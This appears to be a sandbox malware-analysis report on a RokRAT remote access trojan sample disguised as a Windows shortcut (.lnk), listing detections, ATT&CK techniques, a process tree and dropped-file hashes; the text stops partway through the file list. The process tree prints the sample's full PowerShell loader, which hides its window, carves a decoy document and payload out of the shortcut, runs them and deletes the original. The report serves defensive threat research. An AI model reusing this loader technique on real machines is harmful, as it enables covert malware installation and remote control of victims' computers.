rokrat | 53ea99f463412c04f4e1f8116c6b7b76132f44600511e36b702855c1dfefcb98

Analysis

max time kernel
146s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
26-02-2024 04:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mal.lnk
Size

221.4MB
MD5

5f6682ad9da4590cba106e2f1a8cbe26
SHA1

7043c7c101532df47c832ce5270745dd3d1e8c08
SHA256

dbd5d662cc53d4b91cf7da9979cdffd1b4f702323bb9ec4114371bc6f4f0d4a6
SHA512

e744d1b0cf232c4cf224cd1413b13e41889692e2d1f29e948fe8d4a5cb1304bca9a7b5de9c34db98c8eb7440761d5233bc5ac6a4fe75de2d4009a06f318c1d35
SSDEEP

24576:P0sde6UvoEkUnigRXTTYdy830QtO0oIJjW7sFAc1Mh5l2yf:Mz6UvRXigjbaJa7f2yf

Score

10^/10

rokrat rat

Malware Config

Signatures

Detect Rokrat payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3664-128-0x0000000032DA0000-0x0000000032E83000-memory.dmp	family_rokrat
behavioral2/memory/3664-131-0x0000000032DA0000-0x0000000032E83000-memory.dmp	family_rokrat

Rokrat
Rokrat is a remote access trojan written in c++.
rat rokrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

43 3664 powershell.exe
65 3664 powershell.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

powershell.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation cmd.exe
Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1948 powershell.exe
Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\22103.dat powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
43	3664	powershell.exe
65	3664	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
1948	powershell.exe

description	ioc	process
File created	C:\Windows\22103.dat	powershell.exe

Modifies registry class 2 IoCs

Processes:

powershell.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

1948 powershell.exe
1948 powershell.exe
3664 powershell.exe
3664 powershell.exe
3664 powershell.exe
3664 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1948 powershell.exe
Token: SeDebugPrivilege 3664 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

OpenWith.exe

pid process

1888 OpenWith.exe

pid	process
1948	powershell.exe
1948	powershell.exe
3664	powershell.exe
3664	powershell.exe
3664	powershell.exe
3664	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	3664	powershell.exe

pid	process
1888	OpenWith.exe

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

cmd.execmd.exepowershell.execsc.execmd.exepowershell.execsc.execsc.execsc.execsc.exe

description	pid	process	target process
PID 3752 wrote to memory of 4408	3752	cmd.exe	cmd.exe
PID 3752 wrote to memory of 4408	3752	cmd.exe	cmd.exe
PID 3752 wrote to memory of 4408	3752	cmd.exe	cmd.exe
PID 4408 wrote to memory of 3852	4408	cmd.exe	cmd.exe
PID 4408 wrote to memory of 3852	4408	cmd.exe	cmd.exe
PID 4408 wrote to memory of 3852	4408	cmd.exe	cmd.exe
PID 4408 wrote to memory of 1948	4408	cmd.exe	powershell.exe
PID 4408 wrote to memory of 1948	4408	cmd.exe	powershell.exe
PID 4408 wrote to memory of 1948	4408	cmd.exe	powershell.exe
PID 1948 wrote to memory of 3036	1948	powershell.exe	csc.exe
PID 1948 wrote to memory of 3036	1948	powershell.exe	csc.exe
PID 1948 wrote to memory of 3036	1948	powershell.exe	csc.exe
PID 3036 wrote to memory of 1076	3036	csc.exe	cvtres.exe
PID 3036 wrote to memory of 1076	3036	csc.exe	cvtres.exe
PID 3036 wrote to memory of 1076	3036	csc.exe	cvtres.exe
PID 1948 wrote to memory of 1604	1948	powershell.exe	cmd.exe
PID 1948 wrote to memory of 1604	1948	powershell.exe	cmd.exe
PID 1948 wrote to memory of 1604	1948	powershell.exe	cmd.exe
PID 1604 wrote to memory of 3664	1604	cmd.exe	powershell.exe
PID 1604 wrote to memory of 3664	1604	cmd.exe	powershell.exe
PID 1604 wrote to memory of 3664	1604	cmd.exe	powershell.exe
PID 3664 wrote to memory of 4492	3664	powershell.exe	csc.exe
PID 3664 wrote to memory of 4492	3664	powershell.exe	csc.exe
PID 3664 wrote to memory of 4492	3664	powershell.exe	csc.exe
PID 4492 wrote to memory of 4504	4492	csc.exe	cvtres.exe
PID 4492 wrote to memory of 4504	4492	csc.exe	cvtres.exe
PID 4492 wrote to memory of 4504	4492	csc.exe	cvtres.exe
PID 3664 wrote to memory of 4764	3664	powershell.exe	csc.exe
PID 3664 wrote to memory of 4764	3664	powershell.exe	csc.exe
PID 3664 wrote to memory of 4764	3664	powershell.exe	csc.exe
PID 4764 wrote to memory of 3568	4764	csc.exe	cvtres.exe
PID 4764 wrote to memory of 3568	4764	csc.exe	cvtres.exe
PID 4764 wrote to memory of 3568	4764	csc.exe	cvtres.exe
PID 3664 wrote to memory of 5032	3664	powershell.exe	csc.exe
PID 3664 wrote to memory of 5032	3664	powershell.exe	csc.exe
PID 3664 wrote to memory of 5032	3664	powershell.exe	csc.exe
PID 5032 wrote to memory of 448	5032	csc.exe	cvtres.exe
PID 5032 wrote to memory of 448	5032	csc.exe	cvtres.exe
PID 5032 wrote to memory of 448	5032	csc.exe	cvtres.exe
PID 3664 wrote to memory of 4996	3664	powershell.exe	csc.exe
PID 3664 wrote to memory of 4996	3664	powershell.exe	csc.exe
PID 3664 wrote to memory of 4996	3664	powershell.exe	csc.exe
PID 4996 wrote to memory of 2428	4996	csc.exe	cvtres.exe
PID 4996 wrote to memory of 2428	4996	csc.exe	cvtres.exe
PID 4996 wrote to memory of 2428	4996	csc.exe	cvtres.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\mal.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
2⤵
- Suspicious use of WriteProcessMemory
PID:4408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
3⤵
PID:3852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
3⤵
- Deletes itself
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h3y1touj\h3y1touj.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB304.tmp" "c:\Users\Admin\AppData\Local\Temp\h3y1touj\CSCDC83F4932F064EDFB44E1EE81D772685.TMP"
5⤵
PID:1076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\working.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'temp.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
5⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3664

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fuakf1qd\fuakf1qd.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:4492

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1A1.tmp" "c:\Users\Admin\AppData\Local\Temp\fuakf1qd\CSCF215DAD1D8548D7913F6A61A1DC18CE.TMP"
7⤵
PID:4504

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lgxdt2lb\lgxdt2lb.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:4764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES385.tmp" "c:\Users\Admin\AppData\Local\Temp\lgxdt2lb\CSCB71131E0BA524C51BD6EE8F64F3E2B2B.TMP"
7⤵
PID:3568

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ayv2laru\ayv2laru.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:5032

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES56A.tmp" "c:\Users\Admin\AppData\Local\Temp\ayv2laru\CSC722B809BEBDB4464B891FF7F4F3CBE9F.TMP"
7⤵
PID:448

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\543tdzir\543tdzir.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:4996

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES693.tmp" "c:\Users\Admin\AppData\Local\Temp\543tdzir\CSC4A20ED31A24A918CF6B189EA47EF26.TMP"
7⤵
PID:2428

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1888

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
6a9c5bc2ee6d7cd94a37666fbd51356c

SHA1
23bde30a24e86c5aa4e1086e26e467508a66d1a4

SHA256
03519f0c33225b8a1f3c23f5d641bd06de2b60356a0175ca34983ac29aac6da3

SHA512
e8e38d0e223e6a6ef59e60e56621f5b8a09a8ed50ec7cc4b1f39f7241c6e0bf0c8cbbaac70ce9d660ab8263f9c80bbc896c7d43621ef1b4950071435c2a7fc36

Download Submit
C:\Users\Admin\AppData\Local\Temp\543tdzir\543tdzir.dll
Filesize
3KB

MD5
e81a83d4a19199fac530c9355b09c586

SHA1
a88e7f30d51137a71e85500e5c58f4626ec445bc

SHA256
3f3e7e628c8b2da0b9bfaad18cf2215863db48096c1374bce375ab9c551e805d

SHA512
b2099a881524cd3b3d5d9a65c2b1d762350dcad95df53c4df4988fe2d96ee1db505774c3c35c4b63a571195cdff9050361ce77c76e2083b9980fc46e48c54277

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1A1.tmp
Filesize
1KB

MD5
5759dfdb38382c00a73de2ea578e9c54

SHA1
8357e2059411343ff1beedfdc0393b0ac7c446ba

SHA256
eddccf4d8309419d74c649195d70da7aeea7171b96b079f2a5931333314a701e

SHA512
99d59659031370b56a232ee6841937f0885f131884622058091762c38f331d401609b76898e275cca059eb1ed02a9973ea16ac8d22b173528a62dcba36cbd5da

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES385.tmp
Filesize
1KB

MD5
11ca756f997c3e1a025bb908764a53ce

SHA1
ee88f6d095a3c0a52f1eebad635bd9c5e0ca3592

SHA256
e364649e3ce820f53cedc3afd3f2cd7e59f94e724d10dbaa91267c01741c435f

SHA512
d9c24b5471bff50e36eef08fdbcb623a074cb5c32daa7d633f992c566ab12ebbb36d9e1b2aebd7c892bc9f63da3ca371c9bcf21989a7d564591b63a9ad97b9d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES56A.tmp
Filesize
1KB

MD5
fa70915543ad2e499584f5440382c469

SHA1
c2b33fead2ff3a62deae4cc66f198899dae26415

SHA256
83d75f97b2cae693dbc81afe2d9af1c090602220dd8b25cbba87f59b050451f7

SHA512
8e3f674a8095c0d0aa1ddc6435b1c9dbcd0e179508950dfb154c904e7a8a8f60d8f697f8e0dbee5d976ed30032b5339127a799fd8c1f1d299d540aec12a5f109

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES693.tmp
Filesize
1KB

MD5
adb97e5daa67dbd799827b8f1261d877

SHA1
1e4a98e4e1ac4e3f319260244ca9e0ecff9a666f

SHA256
ced3679b3a313bdf786f2192bb25061841bc237ae7d573b137f9c561b8ad9fda

SHA512
6630e803ddf6623316d3658aa7418af2a696c9a3f339edd3ea60772deb653cd8a9b92f47c78e13824ca789b7d9d35d136826735fb702d75be31a2200351de9c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB304.tmp
Filesize
1KB

MD5
16cabe1bb38b67a95ed903f435ed26cb

SHA1
c0b1dd4a81a5054d3736f272ef2592946e745ea6

SHA256
8ef3fed7f5d4351983166a9d2f28ff0a469c9f1b96b87bb6d4a40be67edb4dc5

SHA512
701b6b3cbf697855c88200b66ff065f29a4df2136b6395de3bf686ba3b56904e6662289d90d673d7c9720c81d006962e34219b736f6a589346efce75b3269506

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbb1r1nn.g0f.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ayv2laru\ayv2laru.dll
Filesize
3KB

MD5
5aff4e49fd823031e4952af61227d5c5

SHA1
db21082430a4b80b270da7c7c97a67020237f2c2

SHA256
1909f5b970ff301ffa83930631a4d2613f8eb83f29104d66d7371f57fda43c5c

SHA512
e87617f68dd7c1cee0efa6612791999e8ed14a30235d49a9940d903a56d6e7d56df72d82263426b9d478ed56d915864baad9ed9aa94452481e14126c577b8e0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuakf1qd\fuakf1qd.dll
Filesize
3KB

MD5
e111037439d9673b236e9d368161c656

SHA1
63d6a6a472eb9f723d4fb36905183f24ff9f1ae7

SHA256
2a96310796d0733b9a2f528d68e5e407a836f3809327780a44ed665cfa124d90

SHA512
e0fcd6318f30c1d18bdea203e73a42ef37b6e40b99a31bf3fd6294608ae8d87b55aafe2a90f4c5e55f8c0ed0058ee1d6a93c8def9367b5a976c08261962c41f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\h3y1touj\h3y1touj.dll
Filesize
3KB

MD5
41b5009c1e601b7ee6664917ace9f28c

SHA1
bddb292fe39d3c5edbf921f4ce8c2b071d260ec1

SHA256
0001c0c21fa6f2ddb3574f7204b0c2fa0566de18239dc1480ed64ecfd06eaf21

SHA512
564134052245c393530b9c4bcb0722058d641cd1a1d085429efb65c0b78834f32c4f8d28ede555b26b22b70cc8f2e2c5d8bd00f9505e0fd2501b659de72246d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\lgxdt2lb\lgxdt2lb.dll
Filesize
3KB

MD5
231c64d72733a5a4151f6304efab868b

SHA1
ee9d23b1a0a4dbfd884f134f6ab2ecae0569cafc

SHA256
e1a3eaf0a20a5dc577585f7088c7a1a565a0c485023ac9347c4ffe5b40bc8b3d

SHA512
d055f95c45ed04277ed5135fbe3b12d9dac07371a5842d40c80b868689e03e91b1f42c33682c9827d69f414a0599df25dfd7dd7f799a9184ef30f48d5525a7f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.dat
Filesize
1KB

MD5
78480139d86520ba82766c5b3c9a7479

SHA1
436e5aa0ef8c97a0b78a4289d19860c1ab8c1f1a

SHA256
85438bc7af4c48130c1fd51f8a02eb13b8d57b983411b15fa7f03a302e8e6d8c

SHA512
bc5ce718cf3330ab56a131e874785bd86eef4aa19281d3225401f9e33b798dac6cb6e3e58ba2780d9f3a223a7e16e50f1f64a01d03e1b6e78ea56778cfd449d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\working.bat
Filesize
311B

MD5
a1640eb8f424ebe13b94955f8d0f6843

SHA1
8551e56c3e19861dbcae87f83b6d0ab225c3793d

SHA256
6c0b21b211ba77b42631e1a2a010f858b8664a8bd0149573596a8cdd72e7c399

SHA512
6b40b95ac1979a81ed44f991375dc94fda64b872c79c18111d72210a24867811d925acae4b87d378bd9f1adc86cb9adcf359ff873be7e4579869bd7418d466c8

Download Submit
C:\Users\Public\public.dat
Filesize
869KB

MD5
31aeb43b981d4d6272193e321bb21333

SHA1
84a21d2eb2847bcb53442e0aa7ab3f90dd796a61

SHA256
903b02ff3ef690ea53103737a07c36a732bd81ab04f78d6f5eb61ac0fc6f98a6

SHA512
7efb4cfd865a59b51b46e7071e3b346808a41621e893e6867658827c628d77866737697084c9b7c2cef110942aa2ad21e932642ef5feadb379cf8e7257b4cc88

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\543tdzir\543tdzir.0.cs
Filesize
259B

MD5
560e1b883a997afcfa3b73d8a5cddbc1

SHA1
2905f3f296ac3c7d6a020fb61f0819dbea2f1569

SHA256
e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

SHA512
041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\543tdzir\543tdzir.cmdline
Filesize
369B

MD5
72617937effe29695d5bce410cf3a443

SHA1
2dfbe50a4fae6790098950e0b3bbe7c61393c264

SHA256
c80d322ea6b9147359135ea40472c7b6a1cae9dfb8c7d8fcb21b700a293c879b

SHA512
4abcf8714661d6f41da29de2e9b1fda88ee90a333eb9494722200bf3dabbbec06f01a870842246f74f88cdfc62d710278e6f993ad65f5c11178b9264780d74d4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\543tdzir\CSC4A20ED31A24A918CF6B189EA47EF26.TMP
Filesize
652B

MD5
b7dee28722552c2a3e6d332b911a1865

SHA1
13dd2c98754beb8c73cdeffe8d16b01bc238ac22

SHA256
683448e99ba604a1ca471a91bcb034a06c19e1abbf31e06b1ced0c0f5dc5f189

SHA512
883d89d7a033e658ae2a675015a44760ba89a6458b284015a4421b46fff9f5d39de1673224b316f8fcfccef55cf10e75b78593b42e09697717ceb0b0e3148c5b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ayv2laru\CSC722B809BEBDB4464B891FF7F4F3CBE9F.TMP
Filesize
652B

MD5
b0b2766223e28891464a11dfd6abff6b

SHA1
8d426d3ab7320bac84c6228c40cc96fac744a9f4

SHA256
3ccb21b1b344604e991f9274585d259c9011591d305d9dd8b2daa3747453b329

SHA512
3d5e613f6b058012921d1b02c500f66ad2767e6be1f96434e521cd23c15b381fc9c81cf30cc04e85ccceec54cec6e25105cf994df77ccf6a5a9a6762682b293d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ayv2laru\ayv2laru.0.cs
Filesize
286B

MD5
b23df8158ffd79f95b9bddd18738270b

SHA1
79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

SHA256
856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

SHA512
e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ayv2laru\ayv2laru.cmdline
Filesize
369B

MD5
9104b0528cdb7bb0b0ccff681a3e5491

SHA1
e6d55ea84e19003afb1c975a483a9b60e66f415a

SHA256
b0e10463a673148cea6ee8efc9a265fc44165ba935746cf60ef3440d85be80d5

SHA512
ed4256b323d7390af398451b6876b5a62290e96232603eefa9b25243c92c47080be7e6aa7e560198ba9f67d0a86a1ee06c4e57f20b2c0190fda575bdf13aba97

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fuakf1qd\CSCF215DAD1D8548D7913F6A61A1DC18CE.TMP
Filesize
652B

MD5
7de9be848ed32cd341bd32f6d379c18d

SHA1
1f9f84c695d40f2d3a796b020006368754ce1d40

SHA256
c419b3740223b2795636311773ad9389f104974789f8af278930811738e8d016

SHA512
4e536657ef9e396b4d40343f6e5a513115d8c9c0c9b09dd5b9174ebf3d437010723b4d0b38bfaea7d2532211512f0e8315817c61dc752d49f4bde489e632907e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fuakf1qd\fuakf1qd.0.cs
Filesize
249B

MD5
69ecfeb3e9a8fb7890d114ec056ffd6d

SHA1
cba5334d2ffe24c60ef793a3f6a7f08067a913db

SHA256
0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

SHA512
be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fuakf1qd\fuakf1qd.cmdline
Filesize
369B

MD5
b8e54e4a8ff1c581889c6fb3d1debc72

SHA1
001c3b83b1cee0d7b4095aca131c2ca67235cd94

SHA256
